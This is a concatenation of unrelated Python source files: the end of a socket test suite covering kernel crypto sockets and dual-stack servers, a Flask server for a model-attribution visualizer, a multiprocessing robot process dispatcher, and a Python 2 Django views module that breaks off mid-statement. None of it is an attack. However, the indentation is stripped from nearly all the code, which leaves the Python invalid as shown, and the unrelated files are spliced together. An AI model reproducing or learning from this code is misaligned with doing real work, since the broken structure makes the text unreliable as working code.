algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = support.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if support.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if support.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
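# Illustrative sketch (not part of the test suite): one listener serving
# both IPv4 and IPv6 clients when the platform supports dual-stack, the
# setup the dual-stack tests below rely on.
def _demo_dualstack_server(port=0):
    if socket.has_dualstack_ipv6():
        return socket.create_server(("", port), family=socket.AF_INET6,
                                    dualstack_ipv6=True)
    return socket.create_server(("", port))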
class CreateServerFunctionalTest(unittest.TestCase):
timeout = 3
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = support.find_unused_port()
if sys.platform == 'OpenVMS':
srv_name = '127.0.0.1'
else:
srv_name = ''
with socket.create_server((srv_name, port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = support.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
server.py
|
#!/usr/bin/env python3
import logging
import os
import socket
import threading
from time import sleep
from typing import Optional
from flask import Flask, jsonify, render_template, request
from torch import Tensor
app = Flask(
__name__, static_folder="frontend/build/static", template_folder="frontend/build"
)
visualizer = None
port = None
def namedtuple_to_dict(obj):
if isinstance(obj, Tensor):
return obj.item()
if hasattr(obj, "_asdict"): # detect namedtuple
return dict(zip(obj._fields, (namedtuple_to_dict(item) for item in obj)))
elif isinstance(obj, str): # iterables - strings
return obj
elif hasattr(obj, "keys"): # iterables - mapping
return dict(
zip(obj.keys(), (namedtuple_to_dict(item) for item in obj.values()))
)
elif hasattr(obj, "__iter__"): # iterables - sequence
return type(obj)((namedtuple_to_dict(item) for item in obj))
else: # non-iterable cannot contain namedtuples
return obj
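# Usage sketch (assumed example, not part of the app): nested namedtuples
# are converted recursively so the visualizer output can be jsonify()-ed.
# >>> from collections import namedtuple
# >>> Point = namedtuple("Point", ["x", "y"])
# >>> namedtuple_to_dict(Point(x=1.0, y=[Point(2, 3)]))
# {'x': 1.0, 'y': [{'x': 2, 'y': 3}]}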
@app.route("/attribute", methods=["POST"])
def attribute():
# force=True is needed for Colab notebooks, which don't use the correct
# Content-Type header when forwarding requests through the Colab proxy
r = request.get_json(force=True)
return jsonify(
namedtuple_to_dict(
visualizer._calculate_attribution_from_cache(r["instance"], r["labelIndex"])
)
)
@app.route("/fetch", methods=["POST"])
def fetch():
# force=True needed, see comment for "/attribute" route above
visualizer._update_config(request.get_json(force=True))
visualizer_output = visualizer.visualize()
clean_output = namedtuple_to_dict(visualizer_output)
return jsonify(clean_output)
@app.route("/init")
def init():
return jsonify(visualizer.get_insights_config())
@app.route("/")
def index(id=0):
return render_template("index.html")
def get_free_tcp_port():
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.bind(("", 0))
addr, port = tcp.getsockname()
tcp.close()
return port
def run_app(debug: bool = True):
app.run(port=port, use_reloader=False, debug=debug)
def start_server(
_viz, blocking: bool = False, debug: bool = False, _port: Optional[int] = None
):
global visualizer
visualizer = _viz
global port
if port is None:
os.environ["WERKZEUG_RUN_MAIN"] = "true" # hides starting message
if not debug:
log = logging.getLogger("werkzeug")
log.disabled = True
app.logger.disabled = True
port = _port or get_free_tcp_port()
print(f"\nFetch data and view Captum Insights at http://localhost:{port}/\n")
# Start in a new thread to not block notebook execution
# Thread.start() returns None, so keep a reference to the Thread object
t = threading.Thread(target=run_app, kwargs={"debug": debug})
t.start()
sleep(0.01)  # add a short delay to allow server to start up
if blocking:
    t.join()
return port
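# Usage sketch (assumed example, not part of the app): in a notebook one
# would typically pass a configured visualizer; AttributionVisualizer is
# a hypothetical import path here.
# from captum.insights import AttributionVisualizer
# viz = AttributionVisualizer(...)
# port = start_server(viz, blocking=False, debug=False)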
|
dispatcher.py
|
import logging
import multiprocessing
import platform
import time
import typing as T
from logging.handlers import QueueHandler, QueueListener
from threading import Thread
from rembrain_robot_framework import utils
from rembrain_robot_framework.logger.utils import setup_logging
from rembrain_robot_framework.services.watcher import Watcher
from multiprocessing import Queue, Process
"""
WARNING FOR MAINTAINERS:
This class uses its own multiprocessing context.
Do NOT use basic multiprocessing.Queue for mp instances
Instead use either self.mp_context.Queue, or self.manager.Queue (depending on which one you need)
"""
class RobotDispatcher:
DEFAULT_QUEUE_SIZE = 50
def __init__(
self,
config: T.Any = None,
processes: T.Optional[dict] = None,
project_description: T.Optional[dict] = None,
in_cluster: bool = True,
):
self.shared_objects = {}
self.process_pool: T.Dict[str, Process] = {}
self.in_cluster: bool = in_cluster
self.project_description = {}
if project_description is not None:
self.project_description = project_description
elif config and config.get("description"):
self.project_description = config["description"]
# It is important that we create our own separate context.
# fork() can easily wreck stability,
# since we don't know whether the dispatcher will be created after some threads have already started.
# So to protect the user from deadlocking their processes, all processes are spawned in a separate context
self.mp_context = multiprocessing.get_context("spawn")
self.manager = self.mp_context.Manager()
self.processes = {} if processes is None else processes
for name, p in self.processes.items():
if "consume_queues" not in p:
p["consume_queues"] = {}
if "publish_queues" not in p:
p["publish_queues"] = {}
# todo: consider strict typing for the fields in "config"
# todo: remove this param from 'self' - it is not used in other methods
self.config = config
if self.config is None:
self.config = {
"processes": {},
"queues_sizes": {},
"shared_objects": {},
}
self.log_queue: T.Optional[Queue] = None
self._log_listener: T.Optional[QueueListener] = None
self.log: T.Optional[logging.Logger] = None
self.run_logging(project_description, in_cluster)
self.log.info("RobotHost is configuring processes.")
if "processes" not in self.config or not isinstance(
self.config["processes"], dict
):
raise Exception("'Config' params are incorrect. Please, check config file.")
# compare processes and config
if len(self.processes) != len(self.config["processes"]):
raise Exception(
"Number of processes in config is not the same as passed in __init__."
)
# every process passed in __init__ must be declared in the config
if any([p not in self.config["processes"] for p in self.processes]):
raise Exception("Process was not found in config.")
# create queues
consume_queues = {} # consume from queues
publish_queues = {} # publish to queues
self._max_queue_sizes = self._collect_queue_sizes()
for process_name, process_params in self.config["processes"].items():
if not process_params:
continue
if "consume" in process_params:
if type(process_params["consume"]) is not list:
process_params["consume"] = [process_params["consume"]]
for queue in process_params["consume"]:
if queue in consume_queues:
consume_queues[queue].append(process_name)
else:
consume_queues[queue] = [process_name]
if "publish" in process_params:
if not isinstance(process_params["publish"], list):
process_params["publish"] = [process_params["publish"]]
for queue in process_params["publish"]:
if queue in publish_queues:
publish_queues[queue].append(process_name)
else:
publish_queues[queue] = [process_name]
# copy remaining process parameters from the yaml config into self.processes
for key in process_params:
if key not in ("publish", "consume"):
self.processes[process_name][key] = process_params[key]
for queue_name, bind_processes in consume_queues.items():
for process in bind_processes:
queue_size = int(
self.config.get("queues_sizes", {}).get(
queue_name, self.DEFAULT_QUEUE_SIZE
)
)
queue = self.mp_context.Queue(maxsize=queue_size)
self.processes[process]["consume_queues"][queue_name] = queue
if queue_name not in publish_queues:
raise Exception(
f"A process {processes} consumes from a queue {queue_name}, but no publish to it."
)
for process_ in publish_queues[queue_name]:
if queue_name in self.processes[process_]["publish_queues"]:
self.processes[process_]["publish_queues"][queue_name].append(
queue
)
else:
self.processes[process_]["publish_queues"][queue_name] = [queue]
# shared objects
if "shared_objects" in self.config and self.config["shared_objects"]:
self.shared_objects = {
name: utils.generate(obj, self.manager, self.mp_context)
for name, obj in self.config["shared_objects"].items()
}
# system process queues (dict): process_name (key) => per-process queue (value)
self.system_queues = {
p: self.mp_context.Queue(maxsize=self.DEFAULT_QUEUE_SIZE)
for p in self.processes
}
# for heartbeat
self.watcher_queue = None
if not self.in_cluster:
self.watcher_queue = self.mp_context.Queue(maxsize=self.DEFAULT_QUEUE_SIZE)
self.watcher = Watcher(self.watcher_queue)
Thread(target=self.watcher.notify, daemon=True).start()
def start_processes(self) -> None:
for process_name in self.processes.keys():
self._run_process(process_name)
proc = self.process_pool[process_name]
self.log.info(f"Process {process_name} on PID {proc.pid} started")
def add_process(
self,
process_name: str,
process_class: T.Any,
publish_queues: T.Optional[T.Dict[str, T.List[Queue]]] = None,
consume_queues: T.Optional[T.Dict[str, Queue]] = None,
**kwargs,
) -> None:
if process_name in self.process_pool:
self.log.error(
f"Error at creating new process, process {process_name} is already running."
)
raise Exception("Process already exists in pool.")
if process_name in self.processes:
self.log.error(
f"Error at creating new process, process {process_name} already exists in processes."
)
raise Exception("Process already exists in processes.")
self.processes[process_name] = {
"process_class": process_class,
"consume_queues": consume_queues if consume_queues else {},
"publish_queues": publish_queues if publish_queues else {},
}
self._run_process(process_name, **kwargs)
self.log.info(f"New process {process_name} was created successfully.")
def add_shared_object(self, object_name: str, object_type: str) -> None:
if object_name in self.shared_objects.keys():
raise Exception(f"Shared object {object_name} already exists.")
self.shared_objects[object_name] = utils.generate(
object_type, self.manager, self.mp_context
)
def del_shared_object(self, object_name: str) -> None:
if object_name not in self.shared_objects.keys():
self.log.warning(f"Shared object {object_name} does not exist.")
return
del self.shared_objects[object_name]
def stop_process(self, process_name: str) -> None:
if process_name not in self.process_pool.keys():
self.log.error(f"Process {process_name} is not running.")
return
process: Process = self.process_pool[process_name]
if process.is_alive():
process.terminate()
process.join()
del self.process_pool[process_name]
del self.processes[process_name]
def check_queues_overflow(self) -> bool:
is_overflow = False
if platform.system() == "Darwin":
return is_overflow
for p_name, process in self.processes.items():
for q_name, queue in process["consume_queues"].items():
q_size: int = queue.qsize()
if hasattr(queue, "_maxsize"):
q_maxsize = queue._maxsize
else:
q_maxsize = self.get_queue_max_size(q_name)
if q_maxsize - q_size <= int(q_maxsize * 0.1):
self.log.warning(
f"Consume queue {q_name} of process {p_name} has reached {q_size} messages."
)
is_overflow = True
for q_name, queues in process["publish_queues"].items():
for q in queues:
q_size: int = q.qsize()
if hasattr(q, "_maxsize"):
q_maxsize = q._maxsize
else:
q_maxsize = self.get_queue_max_size(q_name)
if q_maxsize - q_size <= int(q_maxsize * 0.1):
self.log.warning(
f"Publish queue {q_name} of process {p_name} has reached {q_size} messages."
)
is_overflow = True
if is_overflow:
time.sleep(5)
return is_overflow
def _collect_queue_sizes(self) -> T.Dict[str, int]:
"""
Generates a dictionary of {queue_name: max_size}
We have to do it because some queue types (especially Manager.Queue()) hide the maxsize property
"""
result = {}
queue_names = set()
for params in self.config["processes"].values():
if not params:
continue
# Getting consume queues is enough since we always check that all publish queues are consumed
queues = params.get("consume", [])
if type(queues) is list:
for q in queues:
queue_names.add(q)
else:
queue_names.add(str(queues))
for queue_name in queue_names:
result[queue_name] = int(
self.config.get("queues_sizes", {}).get(
queue_name, self.DEFAULT_QUEUE_SIZE
)
)
return result
def get_queue_max_size(self, queue_name: str) -> int:
return self._max_queue_sizes.get(queue_name, self.DEFAULT_QUEUE_SIZE)
def run(self, shared_stop_run: T.Any = None) -> None:
if platform.system() == "Darwin":
self.log.warning("Checking of queue sizes on this system is not supported.")
while True:
if shared_stop_run is not None and shared_stop_run.value:
break
self.check_queues_overflow()
time.sleep(2)
def _run_process(self, proc_name: str, **kwargs) -> None:
process = self.mp_context.Process(
target=utils.start_process,
daemon=True,
kwargs={
"name": proc_name,
"in_cluster": self.in_cluster,
"shared_objects": self.shared_objects,
"project_description": self.project_description,
"logging_queue": self.log_queue,
"system_queues": self.system_queues,
"watcher_queue": self.watcher_queue,
**self.processes[proc_name],
**kwargs,
},
)
process.start()
self.process_pool[proc_name] = process
# todo: move all logging logic into a separate helper class
def run_logging(self, project_description: dict, in_cluster: bool) -> None:
# Set up logging
self.log_queue, self._log_listener = setup_logging(
project_description, self.mp_context, in_cluster
)
self._log_listener.start()
self.log = logging.getLogger("RobotDispatcher")
# Clear any existing handlers
self.log.handlers.clear()
self.log.setLevel(logging.INFO)
self.log.addHandler(QueueHandler(self.log_queue))
# Don't propagate to root logger
self.log.propagate = False
def stop_logging(self):
self._log_listener.stop()
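# Usage sketch (assumed example): a minimal setup that satisfies the checks
# in __init__ above. ReaderProcess and WriterProcess are hypothetical
# process classes; "frames" is a hypothetical queue name.
#
#     config = {
#         "processes": {"reader": {"publish": "frames"},
#                       "writer": {"consume": "frames"}},
#         "queues_sizes": {"frames": 100},
#         "shared_objects": {},
#     }
#     dispatcher = RobotDispatcher(
#         config=config,
#         processes={"reader": {"process_class": ReaderProcess},
#                    "writer": {"process_class": WriterProcess}},
#         in_cluster=False,
#     )
#     dispatcher.start_processes()
#     dispatcher.run()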
|
views.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import collections, json
from threading import Thread, Timer
from background_task import background
from datetime import datetime, timedelta
from django.core.exceptions import PermissionDenied
from django.db.models import Q
from django.conf import settings
from django.contrib.auth.models import User
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render
from django.views.decorators.cache import never_cache
import requests
from aggregator.models import Variable, Dataset
from lists import *
from datasets import *
from energy_converters import *
from access_controller.policy_enforcement_point import PEP
from query_designer.models import Query, TempQuery, AbstractQuery
from service_builder.models import Service, ServiceInstance
from visualizer.utils import delete_zep_notebook, clone_zep_note, create_zep_arguments_paragraph, delete_zep_paragraph, run_zep_note, \
get_result_dict_from_livy, create_zep_getDict_paragraph, run_zep_paragraph, get_zep_getDict_paragraph_response, close_livy_session, \
create_livy_session
from time import sleep
from wave_energy_pilot.models import Wave_Energy_Converters
from website_analytics.views import *
from website_analytics.models import UserPlans
def check_access(request, service):
access_decision = PEP.access_to_service(request, service.id)
if access_decision is False:
raise PermissionDenied
def configure_spatial_filter(filters, lat_from, lat_to, lon_from, lon_to):
if type(filters) == dict:
if 'op' in filters.keys() and filters['op'] == 'inside_rect':
filters['b'] = '<<{0},{1}>,<{2},{3}>>'.format(lat_from, lon_from, lat_to, lon_to)
else:
filters['a'] = configure_spatial_filter(filters['a'], lat_from, lat_to, lon_from, lon_to)
filters['b'] = configure_spatial_filter(filters['b'], lat_from, lat_to, lon_from, lon_to)
return filters
def configure_temporal_filter(filters, start_date, end_date):
if type(filters) == dict:
if 'op' in filters.keys() and filters['op'] == 'lte_time':
filters['b'] = "'{0}'".format(end_date)
elif 'op' in filters.keys() and filters['op'] == 'gte_time':
filters['b'] = "'{0}'".format(start_date)
else:
filters['a'] = configure_temporal_filter(filters['a'], start_date, end_date)
filters['b'] = configure_temporal_filter(filters['b'], start_date, end_date)
return filters
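# Assumed example (shape inferred from the code above): filters form a
# binary tree of {'a': ..., 'op': ..., 'b': ...} nodes; the two helpers
# walk the tree and overwrite the 'b' operand of the matching leaves.
#
#     filters = {
#         'a': {'a': 'location', 'op': 'inside_rect', 'b': '<<0,0>,<0,0>>'},
#         'op': 'and',
#         'b': {'a': 'time', 'op': 'gte_time', 'b': "'1970-01-01'"},
#     }
#     configure_temporal_filter(filters, '2020-01-01', '2020-12-31')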
def find_visualization_variables(variables, query_id):
return_variables = list()
doc = AbstractQuery.objects.get(pk=query_id).document
for var in variables:
variable_dict = dict({'variable': var, 'query_variable': None, 'title': None, 'unit': None, 'variable_id': None})
for _f in doc['from']:
name = str(_f['select'][0]['name'])
if name[name.find('_') + 1:] == var:
variable_dict['query_variable'] = _f['select'][0]['name']
variable_dict['title'] = Variable.objects.get(pk=int(_f['type'])).title
variable_dict['unit'] = Variable.objects.get(pk=int(_f['type'])).unit
variable_dict['variable_id'] = _f['type']
return_variables.append(variable_dict)
return return_variables
def get_query_aggregates(query_id, var):
temp_q = TempQuery(document=AbstractQuery.objects.get(pk=query_id).document)
new_from = []
for agg in ['min', 'max', 'avg']:
for _f in temp_q.document['from']:
new_select_list = list()
if int(_f['type']) == int(var['variable_id']):
new_select = dict()
for key in _f['select'][0].keys():
new_select[key] = _f['select'][0][key]
new_select['aggregate'] = agg
new_select_list.append(new_select)
for _s in _f['select'][1:]:
_s['exclude'] = True
# _s['aggregate'] = 'AVG'
_s['groupBy'] = False
_s.pop('joined', None)
new_select_list.append(_s)
new_from.append({'select': new_select_list, 'type': _f['type'], 'name': _f['name']})
else:
for _s in _f['select']:
if _s['type'] == "VALUE":
_s['exclude'] = True
_s['groupBy'] = False
else:
_s['exclude'] = True
# _s['aggregate'] = 'AVG'
_s['groupBy'] = False
new_from.append(_f)
temp_q.document['from'] = new_from
# for _f in temp_q.document['from']:
# if int(_f['type']) == int(var['variable_id']):
# _f['select'][0]['exclude'] = False
# _f['select'][0]['aggregate'] = aggregate
# _f['select'][0]['groupBy'] = False
# for _s in _f['select'][1:]:
# _s['exclude'] = True
# _s['groupBy'] = False
# else:
# for _s in _f['select']:
# _s['exclude'] = True
# _s['groupBy'] = False
results = temp_q.execute()[0]['results']
if len(results) > 0:
result = results[0][0], results[0][1], results[0][2]
else:
result = '-', '-', '-'
return result
def convert_unicode_json(data):
if isinstance(data, basestring):
return str(data)
elif isinstance(data, collections.Mapping):
return dict(map(convert_unicode_json, data.iteritems()))
elif isinstance(data, collections.Iterable):
return type(data)(map(convert_unicode_json, data))
else:
return data
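# convert_unicode_json() relies on Python 2 idioms (basestring, iteritems,
# collections.Mapping). A rough Python 3 sketch of the same idea, for
# reference only:
#
#     import collections.abc
#
#     def convert_unicode_json_py3(data):
#         if isinstance(data, str):
#             return data
#         elif isinstance(data, collections.abc.Mapping):
#             return {convert_unicode_json_py3(k): convert_unicode_json_py3(v)
#                     for k, v in data.items()}
#         elif isinstance(data, collections.abc.Iterable):
#             return type(data)(convert_unicode_json_py3(x) for x in data)
#         return data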
def gather_service_args(service_args, request, service_exec, method='get'):
args_to_note = dict()
for arg in service_args:
if method == 'get':
args_to_note[arg] = request.GET[arg]
else:
args_to_note[arg] = request.POST[arg]
print 'user algorithm args:'
print args_to_note
service_exec.arguments = args_to_note
service_exec.save()
return args_to_note
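# Hypothetical call, assuming the usual GET parameters are present:
#   gather_service_args(["start_date", "end_date"], request, service_exec)
#   -> {'start_date': '2018-01-01', 'end_date': '2018-02-01'}
# The gathered arguments are also persisted on the ServiceInstance so that a
# run can be inspected later.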
def get_query_with_updated_filters(request, query_id, method='get'):
query_doc = Query.objects.get(pk=query_id).document
if method == 'get':
query_doc['filters'] = configure_spatial_filter(query_doc['filters'], request.GET["latitude_from"], request.GET["latitude_to"],
request.GET["longitude_from"], request.GET["longitude_to"])
query_doc['filters'] = configure_temporal_filter(query_doc['filters'], request.GET["start_date"], request.GET["end_date"])
else:
query_doc['filters'] = configure_spatial_filter(query_doc['filters'], request.POST["latitude_from"], request.POST["latitude_to"],
request.POST["longitude_from"], request.POST["longitude_to"])
query_doc['filters'] = configure_temporal_filter(query_doc['filters'], request.POST["start_date"], request.POST["end_date"])
print "Updated Filters:"
print query_doc['filters']
new_query = TempQuery(document=query_doc, user=request.user)
new_query.save()
return new_query.id
def clone_service_note(request, service, service_exec):
original_notebook_id = service.notebook_id
if 'notebook_id' in request.GET.keys():
new_notebook_id = request.GET['notebook_id']
else:
new_notebook_id = clone_zep_note(original_notebook_id, "")
service_exec.notebook_id = new_notebook_id
service_exec.save()
print 'Notebook ID: {0}'.format(new_notebook_id)
return new_notebook_id
def create_args_paragraph(request, new_notebook_id, args_to_note, service):
if 'args_paragraph' in request.GET.keys():
new_arguments_paragraph = request.GET['args_paragraph']
else:
new_arguments_paragraph = create_zep_arguments_paragraph(notebook_id=new_notebook_id, title='',
args_json_string=json.dumps(args_to_note))
if service.arguments_paragraph_id is not None:
delete_zep_paragraph(new_notebook_id, service.arguments_paragraph_id)
return new_arguments_paragraph
def create_service_livy_session(request, service_exec):
if 'livy_session' in request.GET.keys():
livy_session = request.GET['livy_session']
else:
# livy_session = run_zep_note(notebook_id=new_notebook_id, exclude=excluded_paragraphs, mode='livy')
livy_session = create_livy_session(service_exec.notebook_id)
service_exec.livy_session = livy_session
service_exec.save()
return livy_session
def execute_service_code(request, service_exec, new_arguments_paragraph, paragraphs):
paragraph_list = [(new_arguments_paragraph, 'gathering user arguments')]
for p in paragraphs:
paragraph_list.append((p['paragraph'], p['status']))
for paragraph, status in paragraph_list:
print 'executing paragraph: ' + paragraph
service_exec.status = status
service_exec.save()
if 'no_exec' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
run_zep_paragraph(service_exec.notebook_id, paragraph, service_exec.livy_session, 'livy')
else:
run_zep_paragraph(service_exec.notebook_id, paragraph, service_exec.livy_session, 'zeppelin')
def clean_up_new_note(notebook_id, wait_time_seconds=0):
print "waiting to clean up note " + str(notebook_id)
sleep(wait_time_seconds)
print "cleaning up note: " + str(notebook_id)
delete_zep_notebook(notebook_id)
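# clean_up_new_note() is normally launched on a background thread with a
# delay, e.g.
#   Thread(target=clean_up_new_note, args=(str(new_notebook_id), 180)).start()
# so the visualization endpoints can still read the cloned note before it is
# deleted.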
def wec_creation(request):
new_wec = json.loads(request.GET['wec_data'])
print new_wec
converter = Wave_Energy_Converters(
title=new_wec['title'],
image_uri='',
min_height=new_wec['min_height'],
